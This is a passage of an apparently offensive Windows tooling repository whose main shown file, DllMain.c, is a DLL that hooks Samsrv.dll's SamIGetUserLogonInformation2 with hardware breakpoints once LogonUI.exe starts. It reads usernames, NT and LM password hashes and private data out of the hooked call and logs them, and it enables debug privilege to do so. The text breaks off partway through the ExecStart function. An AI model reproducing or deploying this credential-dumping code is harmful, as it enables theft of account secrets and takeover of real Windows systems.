├── DumpHashes
    ├── DllMain.c
    ├── DumpHashes.vcxproj
    ├── DumpHashes.vcxproj.filters
    ├── DumpHashes.vcxproj.user
    ├── HardwareBreakingLib.c
    ├── HardwareBreakingLib.h
    ├── Log.c
    ├── Log.h
    ├── LsasrvExports.h
    ├── Source.def
    └── Structs.h
├── ImpersonateTrustedInstaler.sln
├── ImpersonateTrustedInstaler
    ├── ImpersonateTrustedInstaler.vcxproj
    ├── ImpersonateTrustedInstaler.vcxproj.filters
    ├── ImpersonateTrustedInstaler.vcxproj.user
    └── Main.c
├── LICENSE
└── README.md


/DumpHashes/DllMain.c:
--------------------------------------------------------------------------------
   1 | #include <Windows.h>       
   2 | #include <Tlhelp32.h>
   3 | #include <Stdio.h>         
   4 | 
   5 | #include "HardwareBreakingLib.h"
   6 | #include "LsasrvExports.h"
   7 | #include "Log.h"           
   8 | 
   9 | 
  10 | // ======================================================================================================================================================
  11 | 
  12 | #ifndef NT_SUCCESS
  13 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
  14 | #endif
  15 | 
  16 | // https://github.com/winsiderss/phnt/blob/master/ntsam.h#L1203
  17 | #define USER_ALL_USERID 0x00000004
  18 | 
  19 | 
  20 | // ======================================================================================================================================================
  21 | 
  22 | #define HOOKED_DLL_NAME	            L"Samsrv.dll"     
  23 | #define DLL_WAIT_TIME_OUT		    1000 * 05                                   // 5 seconds
  24 | 
  25 | #define PROC_NAME_TO_MONITOR	    L"LogonUI.exe"
  26 | #define PROC_WAIT_TIME_OUT		    1000 * 60  * 1                              // 1 minute
  27 | 
  28 | #define FUNCTION_TO_HOOK            "SamIGetUserLogonInformation2" 
  29 | #define MONITORING_TIME_OUT	        1000 * 60  * 1                              // 1 minute
  30 | 
  31 | // ======================================================================================================================================================
  32 | 
  33 | // \
  34 | #define PRINT_CTX
  35 | 
  36 | //\
  37 | #define CREDENTIALS_THROUGH_RSP
  38 | 
  39 | // ======================================================================================================================================================
  40 | 
  41 | typedef struct _UNICODE_STRING {
  42 |     USHORT Length;
  43 |     USHORT MaximumLength;
  44 |     PWSTR  Buffer;
  45 | } UNICODE_STRING, * PUNICODE_STRING;
  46 | 
  47 | 
  48 | // ======================================================================================================================================================
  49 | /*
  50 | 	@ Global variables
  51 | */
  52 | 
  53 | static HANDLE g_hFoundEvent = NULL;
  54 | 
  55 | // ======================================================================================================================================================
  56 | 
  57 | /*
  58 | @ Waits for a module to load
  59 | */
  60 | HMODULE WaitForModuleToLoad(IN LPCWSTR szModuleName, IN DWORD dwTimeoutMs) {
  61 | 
  62 |     DWORD       dwStart     = GetTickCount64();
  63 |     HMODULE     hModule     = NULL;
  64 | 
  65 |     while (TRUE) {
  66 | 
  67 |         if ((hModule = GetModuleHandleW(szModuleName)))
  68 |             return hModule;
  69 | 
  70 |         if (GetTickCount64() - dwStart > dwTimeoutMs)
  71 |         {
  72 |             DBGPRINTF(L"[!] WaitForModuleToLoad Timeout After %d ms\n", dwTimeoutMs);
  73 |             return NULL;
  74 |         }
  75 | 
  76 |         Sleep(50);
  77 | 
  78 |     }
  79 | }
  80 | 
  81 | // ======================================================================================================================================================
  82 | 
  83 | /*
  84 | 	@ Fetches the PID of the LogonUI.exe process
  85 | */
  86 | 
  87 | BOOL FetchLogonUIProcessID(OPTIONAL OUT DWORD* pdwLogonUIPid) {
  88 | 
  89 |     PROCESSENTRY32      ProcEntry           = { .dwSize = sizeof(PROCESSENTRY32) };
  90 |     HANDLE			    hSnapShot           = INVALID_HANDLE_VALUE;
  91 | 	BOOL                bResults            = FALSE;
  92 | 
  93 |     if ((hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL)) == INVALID_HANDLE_VALUE) {
  94 |         DBGPRINTF(L"[!] CreateToolhelp32Snapshot Failed With Error: %d \n", GetLastError());
  95 |         return FALSE;
  96 |     }
  97 | 
  98 | 	if (!Process32First(hSnapShot, &ProcEntry)) {
  99 | 		DBGPRINTF(L"[!] Process32First Failed With Error: %d \n", GetLastError());
 100 | 		goto _END_OF_FUNC;
 101 | 	}
 102 | 	
 103 |     do {
 104 |          
 105 |         if (_wcsicmp(ProcEntry.szExeFile, PROC_NAME_TO_MONITOR) == 0x00) 
 106 |         {
 107 |             if (pdwLogonUIPid)
 108 | 				*pdwLogonUIPid = ProcEntry.th32ProcessID;
 109 | 
 110 |             bResults = TRUE;
 111 |             break;
 112 |         }
 113 | 
 114 |     } while (Process32Next(hSnapShot, &ProcEntry));
 115 | 
 116 | 
 117 | _END_OF_FUNC:
 118 |     if (hSnapShot != INVALID_HANDLE_VALUE)
 119 | 		CloseHandle(hSnapShot);
 120 | 	return bResults;
 121 | }
 122 | 
 123 | // ======================================================================================================================================================
 124 | 
 125 | /*
 126 | 	@ Waits for the LogonUI.exe process to start
 127 | */
 128 | BOOL MonitorLogonUIProcess() {
 129 | 
 130 |     while (TRUE)
 131 |     {
 132 | 		DWORD dwLogonUIPid = 0x00;
 133 | 
 134 | 		if (FetchLogonUIProcessID(&dwLogonUIPid))
 135 | 		{
 136 | 			if (dwLogonUIPid)
 137 | 			{
 138 | 				DBGPRINTF(L"[i] Found LogonUI.exe PID: %d\n", dwLogonUIPid);
 139 |                 SetEvent(g_hFoundEvent);
 140 | 				return TRUE;
 141 | 			}
 142 | 		}
 143 | 
 144 | 		Sleep(100);
 145 |     }
 146 | 
 147 | 	return FALSE;
 148 | }
 149 | 
 150 | // ======================================================================================================================================================
 151 | 
 152 | 
 153 | VOID WriteHexUnicode(IN LPCWSTR szName, IN PBYTE pBuffer, IN DWORD dwBufferLength, IN BOOL bQueryMemAccess) {
 154 | 
 155 |     DWORD dwIndex = 0x00;
 156 | 
 157 |     DBGPRINTF(L"[*] %s Hex Unicode Dump:\n", szName);
 158 |     DBGPRINTF(L"[*] Address\t\tHex\t\tUnicode\n");
 159 |     DBGPRINTF(L"[*] ----------------------------------------\n");
 160 | 
 161 |     if (!pBuffer || dwBufferLength == 0x00)
 162 |     {
 163 |         DBGPRINTF(L"[*] 0x%08X\t\t(null)\t\t(null)\n", dwIndex);
 164 |         return;
 165 |     }
 166 | 
 167 |     if (bQueryMemAccess)
 168 |     {
 169 |         MEMORY_BASIC_INFORMATION MemBasicInfo = { 0 };
 170 | 
 171 |         __try
 172 |         {
 173 |             VirtualQuery(pBuffer, &MemBasicInfo, sizeof(MEMORY_BASIC_INFORMATION));
 174 |         }
 175 |         __except (EXCEPTION_EXECUTE_HANDLER)
 176 |         {
 177 |             DBGPRINTF(L"[!] VirtualQuery Failed With Error: %d\n", GetLastError());
 178 |         }
 179 | 
 180 |         if (MemBasicInfo.Protect & PAGE_GUARD)
 181 |         {
 182 |             DBGPRINTF(L"[i] Memory Guard Page Detected: [ 0x%p ] ... [ 0x%08X ]\n", MemBasicInfo.BaseAddress, MemBasicInfo.RegionSize);
 183 |             return;
 184 |         }
 185 | 
 186 |         if (MemBasicInfo.Protect & PAGE_NOACCESS)
 187 |         {
 188 |             DBGPRINTF(L"[!] Memory No Access Detected: [ 0x%p ] ... [ 0x%08X ]\n", MemBasicInfo.BaseAddress, MemBasicInfo.RegionSize);
 189 |             return;
 190 |         }
 191 |     }
 192 | 
 193 |     __try
 194 |     {
 195 |         for (dwIndex = 0x00; dwIndex < dwBufferLength; dwIndex++) {
 196 |             if ((dwIndex % 8) == 0) {
 197 |                 DBGPRINTF(L"[*] 0x%08X\t", dwIndex);
 198 |             }
 199 |             DBGPRINTF(L"%04X ", ((WCHAR*)pBuffer)[dwIndex]);
 200 |             if ((dwIndex % 8) == 7) {
 201 |                 DBGPRINTF(L"\t");
 202 |                 for (DWORD i = dwIndex - 7; i <= dwIndex; i++) {
 203 |                     if (((WCHAR*)pBuffer)[i] >= 0x20 && ((WCHAR*)pBuffer)[i] <= 0x7E) {
 204 |                         DBGPRINTF(L"%c", ((WCHAR*)pBuffer)[i]);
 205 |                     }
 206 |                     else {
 207 |                         DBGPRINTF(L".");
 208 |                     }
 209 |                 }
 210 |                 DBGPRINTF(L"\n");
 211 |             }
 212 |         }
 213 | 
 214 |         if ((dwIndex % 8) != 0) {
 215 |             DBGPRINTF(L"\n");
 216 |         }
 217 |     }
 218 |     __except (EXCEPTION_EXECUTE_HANDLER)
 219 |     {
 220 |         DWORD dwExceptionCode = GetExceptionCode();
 221 | 
 222 |         switch (dwExceptionCode) {
 223 | 
 224 |         /*
 225 |         case EXCEPTION_ACCESS_VIOLATION:
 226 |             DBGPRINTF(L"[!] Access Violation Exception: Invalid/Uncommented Memory Access\n");
 227 |             break;
 228 | 
 229 |         case STATUS_GUARD_PAGE_VIOLATION:
 230 |             DBGPRINTF(L"[!] Guard Page Violation Exception: Protected Memory Access\n");
 231 |             break;
 232 |         */
 233 | 
 234 |         default:
 235 |             // DBGPRINTF(L"[!] Exception Occurred While Dumping Memory: 0x%08X\n", dwExceptionCode);
 236 |             break;
 237 |         }
 238 | 
 239 |         return;
 240 |     }
 241 | }
 242 | 
 243 | // ======================================================================================================================================================
 244 | 
 245 | VOID PrintpUnicodeStringProtected(IN ULONG_PTR uAdress)
 246 | {
 247 |     PUNICODE_STRING     uPossibleCredentials    = NULL;
 248 | 
 249 |     __try
 250 |     {
 251 |         uPossibleCredentials = (UNICODE_STRING*)uAdress;
 252 |     }
 253 |     __except (EXCEPTION_EXECUTE_HANDLER)
 254 |     {
 255 |         // DBGPRINTF(L"[!] Exception Occurred At Line %ld : 0x%08X\n", __LINE__, GetExceptionCode());
 256 |     }
 257 | 
 258 |     __try
 259 |     {
 260 |         if (uPossibleCredentials->Buffer) 
 261 |         {
 262 |             if (uPossibleCredentials->Length <= uPossibleCredentials->MaximumLength)
 263 | 				DBGPRINTF(L"[*] Possible Credentials Found: %s\n", uPossibleCredentials->Buffer);
 264 |             else
 265 |                 WriteHexUnicode(L"Possible Credentials Found", (PBYTE)uPossibleCredentials->Buffer, uPossibleCredentials->Length, FALSE);
 266 |         }
 267 |         else 
 268 |         {
 269 |             DBGPRINTF(L"[!] Invalid PUNICODE_STRING Buffer: [ %p ]\n", uPossibleCredentials);
 270 |         }
 271 |     }
 272 |     __except (EXCEPTION_EXECUTE_HANDLER)
 273 |     {
 274 |         // DBGPRINTF(L"[!] Exception Occurred At Line %ld : 0x%08X\n", __LINE__, GetExceptionCode());
 275 |     }
 276 | }
 277 | 
 278 | 
 279 | // ======================================================================================================================================================
 280 | 
 281 | 
 282 | #ifdef PRINT_CTX
 283 | 
 284 | static volatile LONG64 g_PrintedCtxCount = 0x00;
 285 | 
 286 | VOID PrintAddrPntrProtected(IN LPCWSTR szAddrName, IN ULONG_PTR uAddress)
 287 | {
 288 |     __try
 289 |     {
 290 |         DBGPRINTF(L"[i] %s: 0x%p\n", szAddrName, (PVOID)(*(ULONG_PTR*)uAddress));
 291 |     }
 292 |     __except (EXCEPTION_EXECUTE_HANDLER)
 293 |     {
 294 |         // DBGPRINTF(L"[!] Exception Occurred At Line %ld : 0x%08X\n", __LINE__, GetExceptionCode());
 295 |     }
 296 | 
 297 | }
 298 | 
 299 | VOID PrintThreadContext(IN PCONTEXT pThreadCtx) 
 300 | {
 301 | 
 302 | 	DBGPRINTF(L"[i] Thread Context [ #%I64d ]:\n", InterlockedIncrement64(&g_PrintedCtxCount));
 303 | 
 304 | 	DBGPRINTF(L"[i] Rax: 0x%p\n", pThreadCtx->Rax);
 305 | 	DBGPRINTF(L"[i] Rcx: 0x%p\n", pThreadCtx->Rcx);
 306 | 	DBGPRINTF(L"[i] Rdx: 0x%p\n", pThreadCtx->Rdx);
 307 | 	DBGPRINTF(L"[i] Rsi: 0x%p\n", pThreadCtx->Rsi);
 308 | 	DBGPRINTF(L"[i] R8: 0x%p\n", pThreadCtx->R8);
 309 | 	DBGPRINTF(L"[i] R9: 0x%p\n", pThreadCtx->R9);
 310 | 	
 311 |     for (int i = 5; i < 9; i++)
 312 |     {
 313 |         WCHAR szRspOffset[32] = { 0 };
 314 | 		swprintf_s(szRspOffset, _countof(szRspOffset), L"Rsp + 0x%02X", (unsigned int)(i * sizeof(PVOID)));
 315 |         PrintAddrPntrProtected(szRspOffset, pThreadCtx->Rsp + i * sizeof(PVOID));
 316 |     }
 317 | 
 318 | 
 319 |     DBGPRINTF(L"[i] Rip: 0x%p\n", pThreadCtx->Rip);
 320 |     DBGPRINTF(L"[i] Rbp: 0x%p\n", pThreadCtx->Rbp);
 321 |     DBGPRINTF(L"[i] Rdi: 0x%p\n", pThreadCtx->Rdi);
 322 |     DBGPRINTF(L"[i] Rbx: 0x%p\n", pThreadCtx->Rbx);
 323 |     DBGPRINTF(L"[i] R10: 0x%p\n", pThreadCtx->R10);
 324 |     DBGPRINTF(L"[i] R11: 0x%p\n", pThreadCtx->R11);
 325 |     DBGPRINTF(L"[i] R12: 0x%p\n", pThreadCtx->R12);
 326 |     DBGPRINTF(L"[i] R13: 0x%p\n", pThreadCtx->R13);
 327 |     DBGPRINTF(L"[i] R14: 0x%p\n", pThreadCtx->R14);
 328 |     DBGPRINTF(L"[i] R15: 0x%p\n", pThreadCtx->R15);
 329 |     
 330 |     /*
 331 |     DBGPRINTF(L"[i] SegCs: 0x%p\n", pThreadCtx->SegCs);
 332 |     DBGPRINTF(L"[i] SegDs: 0x%p\n", pThreadCtx->SegDs);
 333 |     DBGPRINTF(L"[i] SegEs: 0x%p\n", pThreadCtx->SegEs);
 334 |     DBGPRINTF(L"[i] SegFs: 0x%p\n", pThreadCtx->SegFs);
 335 |     DBGPRINTF(L"[i] SegGs: 0x%p\n", pThreadCtx->SegGs);
 336 |     DBGPRINTF(L"[i] SegSs: 0x%p\n", pThreadCtx->SegSs);
 337 |     DBGPRINTF(L"[i] EFlags: 0x%p\n", pThreadCtx->EFlags);
 338 |     DBGPRINTF(L"[i] Dr0: 0x%p\n", pThreadCtx->Dr0);
 339 |     DBGPRINTF(L"[i] Dr1: 0x%p\n", pThreadCtx->Dr1);
 340 |     DBGPRINTF(L"[i] Dr2: 0x%p\n", pThreadCtx->Dr2);
 341 |     DBGPRINTF(L"[i] Dr3: 0x%p\n", pThreadCtx->Dr3);
 342 |     DBGPRINTF(L"[i] Dr6: 0x%p\n", pThreadCtx->Dr6);
 343 |     DBGPRINTF(L"[i] Dr7: 0x%p\n", pThreadCtx->Dr7);
 344 |     DBGPRINTF(L"[i] ContextFlags: 0x%p\n", pThreadCtx->ContextFlags);
 345 |     DBGPRINTF(L"[i] MxCsr: 0x%p\n", pThreadCtx->MxCsr);
 346 |     DBGPRINTF(L"[i] VectorControl: 0x%p\n", pThreadCtx->VectorControl);
 347 |     DBGPRINTF(L"[i] DebugControl: 0x%p\n", pThreadCtx->DebugControl);
 348 |     DBGPRINTF(L"[i] LastExceptionToRip: 0x%p\n", pThreadCtx->LastExceptionToRip);
 349 |     DBGPRINTF(L"[i] LastExceptionFromRip: 0x%p\n", pThreadCtx->LastExceptionFromRip);
 350 |     DBGPRINTF(L"[i] LastBranchToRip: 0x%p\n", pThreadCtx->LastBranchToRip);
 351 |     DBGPRINTF(L"[i] LastBranchFromRip: 0x%p\n", pThreadCtx->LastBranchFromRip);
 352 |     */
 353 | 
 354 | }
 355 | 
 356 | #endif // PRINT_CTX
 357 | 
 358 | // ======================================================================================================================================================
 359 | 
 360 | 
 361 | #ifdef CREDENTIALS_THROUGH_RSP
 362 | 
 363 | typedef struct _LOGON_HOURS
 364 | {
 365 |     USHORT UnitsPerWeek;
 366 |     PUCHAR LogonHours;
 367 | } LOGON_HOURS, * PLOGON_HOURS;
 368 | 
 369 | typedef struct _SR_SECURITY_DESCRIPTOR
 370 | {
 371 |     ULONG Length;
 372 |     PUCHAR SecurityDescriptor;
 373 | } SR_SECURITY_DESCRIPTOR, * PSR_SECURITY_DESCRIPTOR;
 374 | 
 375 | typedef struct _USER_ALL_INFORMATION
 376 | {
 377 |     LARGE_INTEGER LastLogon;
 378 |     LARGE_INTEGER LastLogoff;
 379 |     LARGE_INTEGER PasswordLastSet;
 380 |     LARGE_INTEGER AccountExpires;
 381 |     LARGE_INTEGER PasswordCanChange;
 382 |     LARGE_INTEGER PasswordMustChange;
 383 |     UNICODE_STRING UserName;
 384 |     UNICODE_STRING FullName;
 385 |     UNICODE_STRING HomeDirectory;
 386 |     UNICODE_STRING HomeDirectoryDrive;
 387 |     UNICODE_STRING ScriptPath;
 388 |     UNICODE_STRING ProfilePath;
 389 |     UNICODE_STRING AdminComment;
 390 |     UNICODE_STRING WorkStations;
 391 |     UNICODE_STRING UserComment;
 392 |     UNICODE_STRING Parameters;
 393 |     UNICODE_STRING LmPassword;
 394 |     UNICODE_STRING NtPassword;
 395 |     UNICODE_STRING PrivateData;
 396 |     SR_SECURITY_DESCRIPTOR SecurityDescriptor;
 397 |     ULONG UserId;
 398 |     ULONG PrimaryGroupId;
 399 |     ULONG UserAccountControl;
 400 |     ULONG WhichFields;
 401 |     LOGON_HOURS LogonHours;
 402 |     USHORT BadPasswordCount;
 403 |     USHORT LogonCount;
 404 |     USHORT CountryCode;
 405 |     USHORT CodePage;
 406 |     BOOLEAN LmPasswordPresent;
 407 |     BOOLEAN NtPasswordPresent;
 408 |     BOOLEAN PasswordExpired;
 409 |     BOOLEAN PrivateDataSensitive;
 410 | } USER_ALL_INFORMATION, * PUSER_ALL_INFORMATION;
 411 | 
 412 | typedef struct _USER_ALLOWED_TO_DELEGATE_TO_LIST
 413 | {
 414 |     ULONG Size;
 415 |     ULONG NumSPNs;
 416 |     UNICODE_STRING SPNList[ANYSIZE_ARRAY];
 417 | } USER_ALLOWED_TO_DELEGATE_TO_LIST, * PUSER_ALLOWED_TO_DELEGATE_TO_LIST;
 418 | 
 419 | typedef struct _USER_INTERNAL6_INFORMATION
 420 | {
 421 |     USER_ALL_INFORMATION I1;
 422 |     LARGE_INTEGER LastBadPasswordTime;
 423 |     ULONG ExtendedFields;
 424 |     BOOLEAN UPNDefaulted;
 425 |     UNICODE_STRING UPN;
 426 |     PUSER_ALLOWED_TO_DELEGATE_TO_LIST A2D2List;
 427 | } USER_INTERNAL6_INFORMATION, * PUSER_INTERNAL6_INFORMATION;
 428 | 
 429 | // ======================================================================================================================================================
 430 | 
 431 | static PVOID volatile g_pInfo = NULL;
 432 | 
 433 | // ======================================================================================================================================================
 434 | 
 435 | VOID FunctionDetour(IN PCONTEXT pThreadCtx) 
 436 | {
 437 | 
 438 | #ifdef PRINT_CTX
 439 | 
 440 | 	DBGPRINTF(L"================================================================================\n");
 441 | 	PrintThreadContext(pThreadCtx);
 442 | 
 443 | #else 
 444 |     
 445 |     DBGPRINTF(L"[i] %hs's Detour Executed\n", FUNCTION_TO_HOOK);
 446 | 
 447 |     if (pThreadCtx->R9 == USER_ALL_USERID)
 448 |     {
 449 | 	    if (pThreadCtx->Rdx == 0x4000 && pThreadCtx->Rsi == 0x4000)
 450 | 	    {
 451 | 		    DBGPRINTF(L"[i] Attempting To Fetch Credentials:\n");
 452 | 
 453 |             PUSER_INTERNAL6_INFORMATION pInfo = NULL;
 454 | 
 455 |             __try
 456 |             {
 457 |                 pInfo = *(PUSER_INTERNAL6_INFORMATION*)(pThreadCtx->Rsp + 0x38);
 458 | 				InterlockedExchangePointer(&g_pInfo, pInfo);
 459 | 
 460 |                 DBGPRINTF(L"[i] [RSP + 0x38]: 0x%p\n", (PVOID)pInfo);
 461 |             }
 462 |             __except (EXCEPTION_EXECUTE_HANDLER)
 463 |             {
 464 |                 DBGPRINTF(L"[!] Exception Occurred At Line %ld : 0x%08X\n", __LINE__, GetExceptionCode());
 465 |             }
 466 | 			
 467 | 	    }
 468 |     }
 469 | 
 470 |     if (InterlockedCompareExchangePointer(&g_pInfo, NULL, NULL))
 471 |     {
 472 |         PUSER_INTERNAL6_INFORMATION pInfo = InterlockedCompareExchangePointer(&g_pInfo, NULL, NULL);
 473 | 
 474 |         __try
 475 |         {
 476 |             PrintpUnicodeStringProtected(&pInfo->I1.UserName);
 477 |         }
 478 |         __except (EXCEPTION_EXECUTE_HANDLER)
 479 |         {
 480 |             DBGPRINTF(L"[!] Exception Occurred At Line %ld : 0x%08X\n", __LINE__, GetExceptionCode());
 481 |         }
 482 | 
 483 |         __try
 484 |         {
 485 |             PrintpUnicodeStringProtected(&pInfo->I1.FullName);
 486 |         }
 487 |         __except (EXCEPTION_EXECUTE_HANDLER)
 488 |         {
 489 |             DBGPRINTF(L"[!] Exception Occurred At Line %ld : 0x%08X\n", __LINE__, GetExceptionCode());
 490 |         }
 491 | 
 492 |         __try
 493 |         {
 494 |             PrintpUnicodeStringProtected(&pInfo->I1.NtPassword);
 495 |         }
 496 |         __except (EXCEPTION_EXECUTE_HANDLER)
 497 |         {
 498 |             DBGPRINTF(L"[!] Exception Occurred At Line %ld : 0x%08X\n", __LINE__, GetExceptionCode());
 499 |         }
 500 | 
 501 |         __try
 502 |         {
 503 |             PrintpUnicodeStringProtected(&pInfo->I1.LmPassword);
 504 |         }
 505 |         __except (EXCEPTION_EXECUTE_HANDLER)
 506 |         {
 507 |             DBGPRINTF(L"[!] Exception Occurred At Line %ld : 0x%08X\n", __LINE__, GetExceptionCode());
 508 |         }
 509 | 
 510 |         __try
 511 |         {
 512 |             PrintpUnicodeStringProtected(&pInfo->I1.PrivateData);
 513 |         }
 514 |         __except (EXCEPTION_EXECUTE_HANDLER)
 515 |         {
 516 |             DBGPRINTF(L"[!] Exception Occurred At Line %ld : 0x%08X\n", __LINE__, GetExceptionCode());
 517 |         }
 518 | 
 519 |         InterlockedExchangePointer(&g_pInfo, NULL);
 520 |     }
 521 | 
 522 | #endif // PRINT_CTX
 523 | 
 524 | 	CONTINUE_EXECUTION(pThreadCtx);
 525 | }
 526 | 
 527 | // This works because SamIGetUserLogonInformation2 is nothing but a wrapper for Sam[p]GetUserLogonInformation
 528 | // It has only one return instruction
 529 | ULONG_PTR GetRetAddress(IN PBYTE pFunction) {
 530 | 
 531 |     for (int i = 0; i < 0x100; i++)
 532 |     {
 533 |         if (pFunction[i] == 0xC3) 
 534 |         {
 535 |             return (ULONG)(pFunction + i);
 536 |         }
 537 |     }
 538 | 
 539 |     return NULL;
 540 | }
 541 | 
 542 | #else
 543 | 
 544 | VOID FunctionDetour(IN PCONTEXT pThreadCtx)
 545 | {
 546 | 
 547 | #ifdef PRINT_CTX
 548 | 
 549 |     DBGPRINTF(L"================================================================================\n");
 550 |     PrintThreadContext(pThreadCtx);
 551 | 
 552 | #else 
 553 | 
 554 |     DBGPRINTF(L"[i] %hs's Detour Executed\n", FUNCTION_TO_HOOK);
 555 | 
 556 |     if (pThreadCtx->R9 == USER_ALL_USERID)
 557 |     {
 558 |         if (pThreadCtx->Rdx == 0x4000 && pThreadCtx->Rsi == 0x4000)
 559 |         {
 560 |             DBGPRINTF(L"[i] Attempting To Fetch Credentials:\n");
 561 | 
 562 |             for (int  i = 0; i < 0x04; i++)
 563 |             {
 564 |                 __try
 565 |                 {
 566 | 					PrintpUnicodeStringProtected((ULONG_PTR)(pThreadCtx->R8 + (i * sizeof(UNICODE_STRING))));
 567 |                 }
 568 |                 __except (EXCEPTION_EXECUTE_HANDLER)
 569 |                 {
 570 |                     DBGPRINTF(L"[!] Exception Occurred At [ i:%d ] Line %ld : 0x%08X\n", i, __LINE__, GetExceptionCode());
 571 |                 }
 572 |             }
 573 |         }
 574 |     }
 575 | 
 576 | #endif // PRINT_CTX
 577 | 
 578 |     CONTINUE_EXECUTION(pThreadCtx);
 579 | }
 580 | 
 581 | 
 582 | #endif // CREDENTIALS_THROUGH_RSP
 583 | 
 584 | 
 585 | // ======================================================================================================================================================
 586 | 
 587 | BOOL SetDebugPrivilege() {
 588 | 
 589 |     BOOL	            bResult                 = FALSE;
 590 |     TOKEN_PRIVILEGES	TokenPrivs              = { 0 };
 591 |     LUID				Luid                    = { 0 };
 592 |     HANDLE	            hCurrentTokenHandle     = NULL;
 593 | 
 594 |     if (!OpenProcessToken((HANDLE)-1, TOKEN_ADJUST_PRIVILEGES, &hCurrentTokenHandle)) {
 595 |         DBGPRINTF(L"[!] OpenProcessToken Failed With Error: %d \n", GetLastError());
 596 |         goto _END_OF_FUNC;
 597 |     }
 598 | 
 599 |     if (!LookupPrivilegeValueW(NULL, SE_DEBUG_NAME, &Luid)) {
 600 |         DBGPRINTF(L"[!] LookupPrivilegeValueW Failed With Error: %d \n", GetLastError());
 601 |         goto _END_OF_FUNC;
 602 |     }
 603 | 
 604 |     TokenPrivs.PrivilegeCount = 0x01;
 605 |     TokenPrivs.Privileges[0].Luid = Luid;
 606 |     TokenPrivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
 607 | 
 608 |     if (!AdjustTokenPrivileges(hCurrentTokenHandle, FALSE, &TokenPrivs, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL)) {
 609 |         DBGPRINTF(L"[!] AdjustTokenPrivileges Failed With Error: %d \n", GetLastError());
 610 |         goto _END_OF_FUNC;
 611 |     }
 612 | 
 613 |     if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
 614 |         DBGPRINTF(L"[!] Not All Privileges Referenced Are Assigned To The Caller \n");
 615 |         goto _END_OF_FUNC;
 616 |     }
 617 | 
 618 |     bResult = TRUE;
 619 | 
 620 | _END_OF_FUNC:
 621 |     if (hCurrentTokenHandle)
 622 |         CloseHandle(hCurrentTokenHandle);
 623 |     return bResult;
 624 | }
 625 | 
 626 | 
 627 | 
 628 | // ======================================================================================================================================================
 629 | 
 630 | BOOL ExecStart() {
 631 | 
 632 | 	HMODULE             hModule                                         = NULL;
 633 | 	HANDLE              hMonitorThread                                  = NULL;
 634 |     ULONG_PTR           uFunction                                       = NULL;
 635 |     ULONG_PTR           uFunctionEnd                                    = NULL;
 636 |     BOOL                bHookingLibInit                                 = FALSE,
 637 |                         bResults                                        = FALSE;
 638 |     WCHAR*              szModuleName                                    = HOOKED_DLL_NAME;
 639 |     CHAR*               cFunctionName                                   = FUNCTION_TO_HOOK;
 640 | 
 641 |     if (!(bHookingLibInit = InitHardwareBreakpointHooking())) {
 642 |         DBGPRINTF(L"[!] InitHardwareBreakpointHooking Failed\n");
 643 |         goto _END_OF_FUNC;
 644 |     }
 645 | 
 646 | 	// May be required to suspend some threads while setting the hardware breakpoint
 647 |     if (!SetDebugPrivilege()) 
 648 |     {
 649 | 		DBGPRINTF(L"[!] SetDebugPrivilege Failed\n");
 650 |     }
 651 | 
 652 | 	if (!(g_hFoundEvent = CreateEventW(NULL, FALSE, FALSE, NULL))) {
 653 | 		DBGPRINTF(L"[!] CreateEvent Failed With Error: %d\n", GetLastError());
 654 | 		goto _END_OF_FUNC;
 655 | 	}
 656 | 
 657 | 	if (!(hModule = WaitForModuleToLoad(szModuleName, DLL_WAIT_TIME_OUT))) {
 658 |         DBGPRINTF(L"[!] WaitForModuleToLoad Failed For %s With Error: %d\n", szModuleName, GetLastError());
 659 |         goto _END_OF_FUNC;
 660 | 	}
 661 | 
 662 | 	if (!(uFunction = (ULONG_PTR)GetProcAddress(hModule, cFunctionName))) {
 663 | 		DBGPRINTF(L"[!] GetProcAddress Failed For %hs With Error: %d\n", cFunctionName, GetLastError());
 664 |         goto _END_OF_FUNC;
 665 | 	}
 666 |    
 667 | 	DBGPRINTF(L"[i] Found %hs's Start Address: 0x%p\n", cFunctionName,  uFunction);
 668 | 
 669 | #ifdef CREDENTIALS_THROUGH_RSP
 670 | 	if (!(uFunctionEnd = GetRetAddress((PBYTE)uFunction))) {
 671 | 		DBGPRINTF(L"[!] GetRetAddress Failed\n");
 672 | 		goto _END_OF_FUNC;
 673 | 	}
 674 | 
 675 | 	DBGPRINTF(L"[i] Found %hs's End Address: 0x%p\n", cFunctionName, uFunctionEnd);
 676 | #endif // CREDENTIALS_THROUGH_RSP
 677 | 
 678 | 
 679 | 	if (!(hMonitorThread = CreateThread(NULL, 0x00, (LPTHREAD_START_ROUTINE)MonitorLogonUIProcess, NULL, 0x00, NULL))) {
 680 | 		DBGPRINTF(L"[!] CreateThread Failed With Error: %d\n", GetLastError());
 681 | 		goto _END_OF_FUNC;
 682 | 	}
 683 | 
 684 | 	DBGPRINTF(L"[i] Waiting For %s To Load ...\n", PROC_NAME_TO_MONITOR);
 685 | 
 686 | 	if (WaitForSingleObject(g_hFoundEvent, PROC_WAIT_TIME_OUT) != WAIT_OBJECT_0)
 687 |     {
 688 | 		DBGPRINTF(L"[!] WaitForSingleObject Timeout After %d ms\n", PROC_WAIT_TIME_OUT);
 689 | 		goto _END_OF_FUNC;
 690 | 	}
 691 |         
 692 |     if (!InstallHardwareBreakingPntHook((PUINT_VAR_T)uFunction, Dr0, (PVOID)FunctionDetour, ALL_THREADS)) {
 693 |         DBGPRINTF(L"[!] InstallHardwareBreakingPntHook Failed (1)\n");
 694 |         goto _END_OF_FUNC;
 695 |     }
 696 | 
 697 | 	DBGPRINTF(L"[+] Hooked %hs's Start\n", cFunctionName);
 698 | 
 699 | #ifdef CREDENTIALS_THROUGH_RSP
 700 | 
 701 |     if (!InstallHardwareBreakingPntHook((PUINT_VAR_T)uFunctionEnd, Dr1, (PVOID)FunctionDetour, ALL_THREADS)) {
 702 |         DBGPRINTF(L"[!] InstallHardwareBreakingPntHook Failed (2)\n");
 703 |         goto _END_OF_FUNC;
 704 |     }
 705 | 
 706 |     DBGPRINTF(L"[+] Hooked %hs's End\n", cFunctionName);
 707 | 
 708 | #endif // CREDENTIALS_THROUGH_RSP
 709 | 
 710 |     DBGPRINTF(L"[i] Monitering Function Call For [%d] ms ...\n", MONITORING_TIME_OUT);
 711 |     Sleep(MONITORING_TIME_OUT);
 712 | 
 713 |     DBGPRINTF(L"[#] Finished \n");
 714 |     bResults = TRUE;
 715 | 
